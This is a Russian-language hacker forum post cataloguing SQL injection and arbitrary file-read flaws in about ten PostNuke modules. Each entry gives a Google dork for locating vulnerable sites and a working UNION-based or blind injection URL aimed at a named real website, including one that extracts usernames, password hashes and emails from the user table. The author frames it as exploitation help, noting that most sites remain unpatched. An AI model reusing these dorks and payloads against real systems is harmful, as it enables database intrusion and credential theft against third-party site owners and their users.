![]() |
Уязвимости модулей PostNuke
PostNuke. Модуль:Subjects SQL
Уязвимый продукт: Модуль:Subjects Функция: printpage Версия: <=1.5 Дорк: "inurl:module=subjects" Уязвимый кусок кода: PHP код:
Из этого кода нифига не видно. если вы до этого не сталкивались с этим движком, так что придётся Вам поверить мне на слово :) Пример уязвимости: http://rentflat.ru/index.php?module=subjects&func=printpage&pageid=-3+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pas s,0x3a,pn_email),6,7,8,9,0,11,12,13+from+nuke_user s+limit+1,1/* Примечание: В данный момент существует версия этого модуля 2.01, в которой эта бага исправлена, но публикую её т.к. модуль достаточно популярен, и мне не встречались сайты с исправленной версией. в основном стоит эта. |
PostNuke. Модуль:FormExpress Blind-SQL
Уязвимый продукт: Модуль:FormExpress Версия: 0.3.5 Дорк: "inurl:module=FormExpress" Уязвимый кусок кода: PHP код:
Пример уязвимости: http://www.westlakehomeinspections.com/index.php?module=FormExpress&func=display_form&for m_id=1*if(substring(version(),1,1)=5,1,2) |
PostNuke. Модуль: pnTresMailer SQL
Уязвимый продукт: Модуль: pnTresMailer Версия: 6.2 Проверял так-же на 6.03 и 6.1 Уязвимость присутствует Дорк: "inurl:module=pnTresMailer" Условие: "magic_quotes-off" Уязвимый кусок кода: PHP код:
Эксплоит: Цитата:
http://www.owa.sjp-darmstadt.de/index.php?op=modload&name=pnTresMailer&file=index& req=PreviewArchive&arch_mid=-1'+union+select+concat_ws(0x3a,User(),Database(),V ersion())/* |
PostNuke. Модуль: PagEd SQL
Уязвимый продукт: Модуль: PagEd(он-же paged) Версия: 0.9 Дорк: "inurl:module=paged" Условие: "нет" Код приводить считаю не целесообразным т.к. фильтрация отсутствует совсем, уязвимых параметров куча Эксплоит: (примеры) Цитата:
http://www.owa.sjp-darmstadt.de/index.php?module=paged&topic_id=4&topictoview=3+un ion+select+1,concat_ws(0x3a,User(),Database(),Vers ion()),3,4/* http://www.owa.sjp-darmstadt.de/index.php?module=paged&page_id=888+union+select+co ncat_ws(0x3a,User(),Database(),Version()),2,3,4/* http://www.owa.sjp-darmstadt.de/index.php?module=paged&file=index&topic_id=1&page_ id=444+union+select+concat_ws(0x3a,User(),Database (),Version()),2,3,4/* |
PostNuke. Модуль: ProdReviews SQL
Уязвимый продукт: Модуль: ProdReviews Версия: 0.42 Дорк: "inurl:module=ProdReviews" Условие: "нет" Уязвимый кусок кода: PHP код:
Эксплоит: Цитата:
http://www.gesundheit.malzminden.de/index.php?module=ProdReviews&func=showcontent&id=-4+union+select+1,2,3,concat_ws(0x3a,User(),Databas e(),Version()),5,6,7,8,9,0,11,12,13,14,15/* |
PostNuke. Модуль: concert SQL
Уязвимый продукт: Модуль: concert Версия: 0.4 Дорк: "inurl:module=concert" Условие: "нет" Уязвимый кусок кода: PHP код:
Пример уязвимости: http://www.palimpsest.com.au/index.php?module=concert&func=display&dc_id=-001+union+select+1,concat_ws(0x3a,User(),Database( ),Version()),3,44,5,6,7,8,9,0,11,12,13,14,15,16,17 ,18,19,20,21 |
PostNuke. Модуль: Credits Чтение произвольных файлов(Это стандартный модуль)
Уязвимый продукт: Модуль: Credits Версия: 1.1 Дорк: "inurl:module=Credits" Условие: "нет" Код к сожалению показать не могу, просто не нашёл его т.к. версия не самая новая, а в версии 1.2 этого бага нет, но описания этой баги нигде не увидел, модуль стандартный версия такая попадается часто, поэтому выкладываю. Итак переходим по ссылке http://site.com/index.php?module=Credits Сдесь показаны все модули и их версии, сразу можно посмотреть версию нашего модуля "Credits", если она нас устраивает нажимаем на просмотр лицензии, или чего там можно посмотреть на любом доступном для этого модуле в разделе "Documentation" Перехватываем пакет Смотрим: Цитата:
Цитата:
Пример уязвимости: http://www.obernet.org/index.php?module=Credits&func=display Можете попробовать сдесь |
PostNuke. Модуль: OpenRealty SQL
Уязвимый продукт: Модуль: OpenRealty Версия: 71c Дорк: "inurl:module=OpenRealty" Условие: "нет" 1 Код PHP код:
Уязвимый параметр or_hid Пример уязвимости: http://www.alpujar.com/english/index.php?module=OpenRealty&func=display&or_hid=-274+union+select+1,2,concat_ws(0x3a,User(),Databas e(),Version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,64/* 2 Код: PHP код:
Пример уязвимости: http://www.bulgarianpropertiesonline.com/modules/OpenRealty/image.php?or_picid=-1074+union+select+1,concat_ws(0x3a,User(),Database (),Version())/* |
PostNuke. Модуль: phPro(Девичья фамилия: phProfession) SQL
Уязвимый продукт: Модуль: phPro(phProfession) Версия: 3.0 Дорк: "inurl:module=phPro" Условие: "нет" Уязвимый кусок кода: PHP код:
История с этим модулем такая, там откуда я его сливал в папке "phprofession" лежали два архива: "phPro_v3.0alpha" и "phprofession2.5.4" код выше из "phPro" , а в "phprofession" в коде даже параметра такого нет, ставить я его не стал(версия старая), а вот в гугле глянул. Оказалось что запись "module=phProfession" в урле можно запросто изменить на "module=phPro" и всё будет нормольно. а вот наоборот нет. Тоесть совместимость вроде должна быть у новой версии со старой, а тут наоборот :) (разбираться с этой байдой не стал, т.к к делу отношения не имеет.Кому хочется привожу оба линка). Примеры уязвимости: http://www.hillelsaroundchicago.org/index.php?module=phPro&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 http://www.arundellodge.org/index.php?module=phProfession&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 |
PostNuke. Модуль: recipes SQL
Уязвимый продукт: Модуль: recipes Версия: <=1.2 Дорк: "inurl:module=recipes" Условие: "нет" 1 Код PHP код:
Уязвимый параметр lid Пример уязвимости: http://footprints-family-recipes.com/index.php?module=recipes&func=display&lid=-48+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8/* Вобщем-то фильтрация отсутствует напрочь, так что скули везде, можно выкладывать весь модуль :) Уязвимый параметр pid Пример уязвимости: http://footprints-family-recipes.com/index.php?module=recipes&func=catview&pid=-9+union+select+1,concat_ws(0x3a,User(),Database(), Version())/* И т.д. |
| Время: 12:34 |